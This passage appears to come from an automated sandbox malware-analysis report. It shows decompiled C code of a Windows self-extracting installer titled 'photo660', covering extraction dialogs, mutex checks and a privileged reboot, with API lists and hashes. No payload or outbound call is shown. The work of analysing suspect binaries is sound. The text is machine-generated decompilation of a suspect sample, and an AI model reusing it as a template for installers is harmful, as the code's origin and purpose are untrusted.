                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E002144B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E00216CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E002144B9(0, 0x522, 0x211140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E00211EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00211EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00211F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00211FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: b8f58bf0aaaaa6622b8225d2492cb0da22db5842ad325b077e9d3a530244b6ac
                                                                                                                                                                                                        • Instruction ID: 798d2ef4b98aeafb02a6c615d4ea17a268664f9c999e18d84a91f2cbbf5ef641
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8f58bf0aaaaa6622b8225d2492cb0da22db5842ad325b077e9d3a530244b6ac
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03210771A513057BDB205FA1AC4EFFF76F8EBA5B10F204019FB06D2481DB7588B29661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00216CF0(char _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				_t1 =  &_a4; // 0x216e26
                                                                                                                                                                                                        				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00216E26,00211000), ref: 00216CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(&n!,?,00216E26,00211000), ref: 00216D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00216E26,00211000), ref: 00216D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00216E26,00211000), ref: 00216D12
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID: &n!
                                                                                                                                                                                                        • API String ID: 3231755760-1956033847
                                                                                                                                                                                                        • Opcode ID: 664609a9e3168517d86e5639c9beca9255607974be0bd9fb71f21a101c979295
                                                                                                                                                                                                        • Instruction ID: 5c555e01a2b8920a67299c63a03e9c45f4d111ca938483cddbf2fb4c55b3450d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 664609a9e3168517d86e5639c9beca9255607974be0bd9fb71f21a101c979295
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BED0C932001108BBDB012BE1FC0CA993F28FB58222F448010F71D82020CE3244518B52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00213210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E002143D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "photo660");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0x219a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0x2191e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E002144B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0x2191e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0x2191e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0x2191e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0x2191e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0x2191e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E0021658A(0x2191e4, 0x104, 0x211140);
                                                                                                                                                                                                        								_t27 = E002158C8(0x2191e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0x2191e4 - 0x5c;
                                                                                                                                                                                                        									if( *0x2191e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E0021597D(0x2191e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0x2191e5 - 0x5c;
                                                                                                                                                                                                        									if( *0x2191e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E002144B9(_t64, 0x54a, 0x2191e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0x2191e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x2191e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0x2191e4 - 0x5c;
                                                                                                                                                                                                        						if( *0x2191e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0x219124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0x219a3c, 0x3e8, 0x218598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E00214224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0x2187a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E002144B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x0021337c
                                                                                                                                                                                                        0x00213388
                                                                                                                                                                                                        0x0021338f
                                                                                                                                                                                                        0x00213394
                                                                                                                                                                                                        0x00213396
                                                                                                                                                                                                        0x002133a4
                                                                                                                                                                                                        0x002133ab
                                                                                                                                                                                                        0x002133b6
                                                                                                                                                                                                        0x002133be
                                                                                                                                                                                                        0x002133c3
                                                                                                                                                                                                        0x002133c5
                                                                                                                                                                                                        0x00213435
                                                                                                                                                                                                        0x00213437
                                                                                                                                                                                                        0x00213437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213437
                                                                                                                                                                                                        0x002133c7
                                                                                                                                                                                                        0x002133c9
                                                                                                                                                                                                        0x002133cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002133cc
                                                                                                                                                                                                        0x002133ad
                                                                                                                                                                                                        0x002133b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002133b4
                                                                                                                                                                                                        0x00213398
                                                                                                                                                                                                        0x00213399
                                                                                                                                                                                                        0x0021339b
                                                                                                                                                                                                        0x0021339c
                                                                                                                                                                                                        0x0021339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021339d
                                                                                                                                                                                                        0x0021334c
                                                                                                                                                                                                        0x00213351
                                                                                                                                                                                                        0x00213354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021335c
                                                                                                                                                                                                        0x00213362
                                                                                                                                                                                                        0x00213364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213366
                                                                                                                                                                                                        0x00213367
                                                                                                                                                                                                        0x00213369
                                                                                                                                                                                                        0x0021336a
                                                                                                                                                                                                        0x0021336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021336b
                                                                                                                                                                                                        0x0021331c
                                                                                                                                                                                                        0x00213323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213329
                                                                                                                                                                                                        0x0021332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021332b
                                                                                                                                                                                                        0x0021324c
                                                                                                                                                                                                        0x0021324c
                                                                                                                                                                                                        0x0021324f
                                                                                                                                                                                                        0x002132c8
                                                                                                                                                                                                        0x002132ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002132ce
                                                                                                                                                                                                        0x00213251
                                                                                                                                                                                                        0x00213256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213271
                                                                                                                                                                                                        0x00213277
                                                                                                                                                                                                        0x00213279
                                                                                                                                                                                                        0x00213298
                                                                                                                                                                                                        0x0021329d
                                                                                                                                                                                                        0x0021329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002132b0
                                                                                                                                                                                                        0x002132b6
                                                                                                                                                                                                        0x002132b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002132be
                                                                                                                                                                                                        0x00213280
                                                                                                                                                                                                        0x00213289
                                                                                                                                                                                                        0x0021328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021328e
                                                                                                                                                                                                        0x0021327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00218598,00000200), ref: 00213271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002133E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 002133F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00213410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00213426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 0021342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 0021343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$photo660
                                                                                                                                                                                                        • API String ID: 2418873061-1202457652
                                                                                                                                                                                                        • Opcode ID: e5eadd88981e83d59fc7df70aa8244688b7385931f02c7d1184cd778eb77d62c
                                                                                                                                                                                                        • Instruction ID: 2547b4691fad86b2af7e9e0d0e8d6946706c0a4a2d7377fab6935b19c9acfa31
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5eadd88981e83d59fc7df70aa8244688b7385931f02c7d1184cd778eb77d62c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C512A303B1251B6E7229F356C4CFFB2DDE9B76B50F108024F509960C0CEB48AE192A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00212CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0x219a3c = __ecx;
                                                                                                                                                                                                        				memset(0x219140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0x218a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0x2188c0, 0, 0x104);
                                                                                                                                                                                                        				 *0x2193ec = 1;
                                                                                                                                                                                                        				_t20 = E0021468F("TITLE", 0x219154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0x21858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0x219a34;
                                                                                                                                                                                                        					if(E0021468F("EXTRACTOPT", 0x219a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0x219a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0x219120 =  *0x219120 & _t65;
                                                                                                                                                                                                        							if(E00215C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0x218a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0x218184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0x218a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E002136EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0x219a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0x219a34 & 0x00000100) == 0 || ( *0x218a38 & 0x00000001) != 0 || E002118A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E00216517(_t57, 0x7d6, _t34, E002119E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00212390(0x218a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E002144B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E0021468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0x218588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0x219a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E002144B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E002144B9(0, 0x54b, "photo660", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0x218588);
                                                                                                                                                                                                        										 *0x219124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0x219124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212ece
                                                                                                                                                                                                        0x00212ede
                                                                                                                                                                                                        0x00212eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212eed
                                                                                                                                                                                                        0x00212eef
                                                                                                                                                                                                        0x00212eef
                                                                                                                                                                                                        0x00212eef
                                                                                                                                                                                                        0x00212eef
                                                                                                                                                                                                        0x00212ea2
                                                                                                                                                                                                        0x00212e86
                                                                                                                                                                                                        0x00212e88
                                                                                                                                                                                                        0x00212e88
                                                                                                                                                                                                        0x00212e43
                                                                                                                                                                                                        0x00212e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212e48
                                                                                                                                                                                                        0x00212e30
                                                                                                                                                                                                        0x00212e30
                                                                                                                                                                                                        0x00212ef8
                                                                                                                                                                                                        0x00212f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212f01
                                                                                                                                                                                                        0x00212d8a
                                                                                                                                                                                                        0x00212d8f
                                                                                                                                                                                                        0x00212da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212da3
